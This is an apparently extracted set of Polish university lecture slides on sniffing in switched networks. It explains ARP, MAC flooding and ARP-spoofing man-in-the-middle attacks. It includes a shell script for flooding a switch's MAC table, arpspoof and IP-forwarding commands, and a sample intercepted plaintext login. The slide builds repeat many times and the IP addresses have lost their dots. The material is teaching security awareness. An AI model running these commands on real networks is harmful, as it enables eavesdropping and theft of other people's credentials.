Wyższa Szkoła Informatyki Stosowanej i Zarządzania. Jakub Stelmaszczyk. Sniffing w sieciach przełączalnych

Wyższa Szkoła Informatyki Stosowanej i Zarządzania Jakub Stelmaszczyk Sniffing w sieciach przełączalnych

Niniejsze materiały są wyłącznie przykładem zagrożeń, na które narażone są sieci komputerowe Należy traktować je jako rozszerzenie wiedzy i pewien dodatek do standardowego programu zajęć SKO Autor nie ponosi odpowiedzialności za to, w jaki sposób użyta zostanie wiedza zawarta w dalszej części tego dokumentu Intencje autora są jasne - jeśli mamy pracować z sieciami, i przede wszystkim, dbać o ich bezpieczeństwo, musimy wiedzieć z jakimi zagrożeniami możemy się spotkać w przyszłości Autor dokumentu wierzy, że nikt z osób na sali, nie wykorzysta tych materiałów do czynów niezgodnych z prawem!

Protokół ARP - (Address Resolution Protocol) używany jest w sieciach lokalnych do kojarzenia adresu sieciowego (np IP) komputera z jego adresem łącza danych - MAC Istnieje też protokół odwrotny - RARP (Reverse ARP), który odwzorowuje adresy MAC na adresy IP Domena rozgłoszeniowa - (broadcast domain) jest częścią sieci, w której przekazywane są ramki rozgłoszeniowe, np zapytania ARP Przełączniki przesyłają ramki z adresem rozgłoszeniowym na wszystkie swoje porty - granice domeny wyznaczają routery (ograniczają one także domenę kolizyjną), które nie propagują rozgłoszeń Bardzo często domena rozgłoszeniowa pokrywa się z domeną kolizyjną Sniffing gromadzenie ruchu sieciowego i jego analiza Sniffer stanowi nieodzowne narzędzie diagnostyczne większości administratorów sieci, zwłaszcza podczas diagnostyki problemów z niezawodnością lub wydajnością połączeń Może być również stosowany do monitorowania aktywności sieciowej osób trzecich, co jest w większości przypadków niezgodne z prawem

ARP Spoofing - to termin określający atak sieciowy, który pozwala atakującemu przechwytywać dane przesyłane w obrębie segmentu sieci LAN (domeny rozgłoszeniowej) Technika ta może być również użyta do blokowania komunikacji (atak DoS) Atak polega na rozsyłaniu w sieci LAN odpowiednio spreparowanych pakietów ARP zawierających fałszywe adresy MAC W efekcie pakiety danych wysyłane przez inne komputery w sieci trafiają do osoby atakującej zamiast do właściwego odbiorcy Pozwala to na podsłuchiwanie komunikacji Inny wariant tego ataku polegający na przeprowadzeniu jednocześnie techniki ARP spoofingu wobec: bramy domyślnej w sieci celem przejęcia ruchu wysyłanego do atakowanego komputera atakowanego komputera celem przejęcia ruchu wysyłanego do bramy domyślnej umożliwia przejęcie zarówno pakietów wysyłanych jak i odbieranych przez atakowany komputer, a co za tym idzie, możliwa jest wtedy modyfikacja transmisji (atak typu Man In The Middle)

Atak Man In The Middle (MITM) to atak polegający na czytaniu i modyfikowaniu komunikacji między dwoma stronami bez ich wiedzy Atak Dos (Denial of Service) atak na system komputerowy lub usługę sieciową w celu uniemożliwienia jej działania Najprostszy DoS to wyciagnięcie wtyczki zasilającej z np router a ;-) Flooding switch a zalanie switcha ogromną ilością pakietów w celu przepełnienia jego bufora Wówczas będzie zachowywał się jak zwykły HUB i każda ramkę którą otrzyma na jeden ze swoich portów, prześle do wszystkich inny portów

Na początek warto odpowiedzieć sobie na kilka pytań:

Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić?

Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne?

Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne? 3 Jak to się robi?

Na początek warto odpowiedzieć sobie na kilka pytań: 1 Po co to robić? 2 Co jest nam potrzebne? 3 Jak to się robi? 4 Jak się zabezpieczyć?

Ad 1 Po co?

Ad 1 Po co? 1 Diagnostyka sieci

Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary

Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP

Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP 4 Przechwycenie plików, które ofiara kopiuje np na (z) serwer(a) ftp

Ad 1 Po co? 1 Diagnostyka sieci 2 Uzyskiwanie loginu i hasła logującej się ofiary 3 Podsłuchiwanie rozmów VoIP 4 Przechwycenie plików, które ofiara kopiuje np na (z) serwer(a) ftp 5 I wiele, wiele innych

Przykład Logujemy się na jakieś forum używając formularza na stronie WWW, np takiej :

Klikamy login i cieszymy się dostępem do forum A jak to widzi ktoś kogo celem ataku Man In The Middle jest właśnie nasz komputer? A no tak :

User : admin Password : kokoszka

Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie:

Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST

Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP

Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP 3 pop3, smtp

Tak widoczne będą hasła dla wszystkich usług gdzie login i hasło jest wysyłane plain text em, czyli bez żadnego szyfrowania Przykładowe usługi działające na plain textcie: 1 Autoryzacja WWW metodą POST 2 FTP 3 pop3, smtp 4 imap

A co jeśli hasło i login są szyfrowane?

A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło :

A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-)

A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle

A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle Konkluzja? stosujemy długie i mocne hasła!

A co jeśli hasło i login są szyfrowane? Wówczas trzeba potraktować zaszyfrowane hasło : a) Atakiem słownikowym (dictionary attack) działa tylko dla słabych haseł w stylu kokoszka ;-) b) Atakiem Brute Force niestety strasznie duża złożoność algorytmiczna, trzeba przepatrzeć wszystkie możliwe układy znaków występujących w haśle Konkluzja? stosujemy długie i mocne hasła! W dalszej części nie będziemy się jednak zajmować tym zagadnieniem, skupimy się na pozyskaniu danych niezbędnych do np złamania hasła

AD 2 Co jest nam potrzebne?

AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej)

AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump

AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump 3 Do ataku Flood potrzebny będzie jakiś program (lub skrypt) który wygeneruje ruch niezbędny do przepełnienia bufora switcha

AD 2 Co jest nam potrzebne? 1 Sieć ;-) (a raczej fizyczny dostęp do domeny rozgłoszeniowej) 2 Sniffer np Ethereal, tcpdump 3 Do ataku Flood potrzebny będzie jakiś program (lub skrypt) który wygeneruje ruch niezbędny do przepełnienia bufora switcha 4 Do ARPSpoofing u np w linuxie program arpspoof pozwalający zatruć protokół ARP

AD 3 Jak to się robi A więc konkrety Żeby coś oszukać trzeba najpierw wiedzieć jak to normalnie działa Dlatego też przyjrzyjmy się jak normalnie działa protokół ARP oraz w jaki sposób switch przekazuje ramki między portami

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: 2171354464/24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:ping 21713544254

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: 2171354464/24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 #: IP: 2171354464/24 MAC: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 #: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Przecież to ja, odpowiadam na tego ARP a! #: #: Src: 00:50:DA:3B:F8:86 Dst: FF:FF:FF:FF:FF:FF Who has 21313544254? Tell 2131354423 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8:86 21713544254 is at 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: Src: 00:C0:4F:17:B3:F8 Dst: 00:50:DA:3B:F8:86 21713544254 is at 00:C0:4F:17:B3:F8 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 #:

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: Mamy komunikację na warstwie 2 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło?

Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło? Ponieważ hasła wysyłane są do Internetu, komunikacja musi przejść przez bramę, chciał nie chciał Musimy więc przechwycić pakiety wysyłane i odbierane między ofiarą, a bramą domyślną

Wiemy więc jak to działa Co więc musimy zrobić aby mieć czyjś login i hasło? Ponieważ hasła wysyłane są do Internetu, komunikacja musi przejść przez bramę, chciał nie chciał Musimy więc przechwycić pakiety wysyłane i odbierane między ofiarą, a bramą domyślną Wiadomo też, że w modelu OSI warstwa druga jest nośnikiem warstw wyższych Dlatego przechwytując warstwę drugą, przechwytujemy warstwy wyższe, mamy więc hasła, rozmowy VoIP itd

Zacznijmy więc od najprostszej metody flooding switch a Do zalania go pakietami posłuży nam następujący skrypt #!/bin/sh for zm_8 in 0 1 2 3 4 5 6 7 8 9 a b c d e f do for zm_9 in 0 1 2 3 4 5 6 7 8 9 a b c d e f do for zm_10 in 0 1 2 3 4 5 6 7 8 9 a b c d e f do for zm_11 in 0 1 2 3 4 5 6 7 8 9 a b c d e f do for zm_12 in 0 1 2 3 4 5 6 7 8 9 a b c d e f do ifconfig eth0 down ifconfig eth0 hw ether 00:00:0${zm_8}:${zm_9}${zm_10}:${zm_11}${zm_12} up arp -s <nieużywany_adres_ip> 00:05:05:05:6c:05 ping <nieużywany_adres_ip> -c 1 & done done done done done echo ${zm}

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #: 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 FLOOD (ICMP) Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 FLOOD (ICMP) Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 Buffer Overflow!!! IP: 2171354464/24 MAC: FLOOD (ICMP) 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: 2171354464/24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: 2171354423/24 21713544254 at 00:C0:4F:17:B3:F8 User : admin Password : kokoszka MAC: 00:50:DA:3B:F8:86

IP: 21713544254/24 Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 MAC: 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Atakujący - Flooder #:/floodsh 2171354423 at 00:50:DA:3B:F8:86 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 all ports 00:50:DA:3B:F8:86 all ports all ports FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8

Wadą tej techniki jest fakt, że zadziała tylko na tanich, niezarządzalnych switch ach Te droższe mają już zaimplementowane algorytmy pozwalające na wykrycie flooding u i zablokowanie nieznanych pakietów unicast lub multicast Przed tego typu atakiem można zabezpieczyć się budując sieć na droższym sprzęcie (CISCO Catalyst? ;-) ) Przejdźmy więc do bardziej wyrafinowanej metody do ARP Spoofing u i przykładu ataku Man In The Middle

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 #:arpspoof -t 2171354423 21713544254 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: Src : Dst : 00:50:DA:3B:F8:86 21713544254 is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: Src : Dst : 00:50:DA:3B:F8:86 21713544254 is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports Src : Dst : 00:50:DA:3B:F8:86 21713544254 is at IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 #:arpspoof -t 21713544254 2171354423 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: Src : Dst : 00:C0:4F:17:B3:F8 2171354423 is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: Src : Dst : 00:C0:4F:17:B3:F8 2171354423 is at 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 00:50:DA:3B:F8:86 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 Src : Dst : 00:C0:4F:17:B3:F8 2171354423 is at IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 #:sysctl netipv4ip_forward=1 2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 2171354464/24 MAC: Src : 00:50:DA:3B:F8:86 Dst : IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

IP: 21713544254/24 #: MAC: 00:C0:4F:17:B3:F8 2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 Src : 00:50:DA:3B:F8:86 Dst : IpDest : 2179721610 IP: 2171354464/24 IpSrc : 2171354423 Destport MAC: : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 MAC: 00:50:DA:3B:F8:86 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka IP: 2171354464/24 MAC: #: 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: Udało się, atakujacy zdobył pakiet z hasłem, musimy jednak sprawić aby komunikacja ofiary z serwerem www nadal miała miejsce Przesyłamy pakiet dalej 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 #:route default gw 21713544254 Src : 00:50:DA:3B:F8:86 Dst : IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

2171354423 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 IP: 21713544254/24 MAC: 00:C0:4F:17:B3:F8 IP: 2171354464/24 MAC: Src : 00:50:DA:3B:F8:86 Dst : 00:C0:4F:17:B3:F8 IpDest : 2179721610 IpSrc : 2171354423 Destport : HTTP (80) 2171354423 at 00:50:DA:3B:F8:86 21713544254 at 00:C0:4F:17:B3:F8 POST /? HTTP 11 (application/xwww-form-urlencoded) User : admin Password : kokoszka 00:C0:4F:17:B3:F8 port 1 00:50:DA:3B:F8:86 port 4 port 5 FF:FF:FF:FF:FF:FF all ports IP: 2171354423/24 21713544254 at 2171354464 at 2171354410 at 00:01:AC:21:EE:A0 MAC: 00:50:DA:3B:F8:86

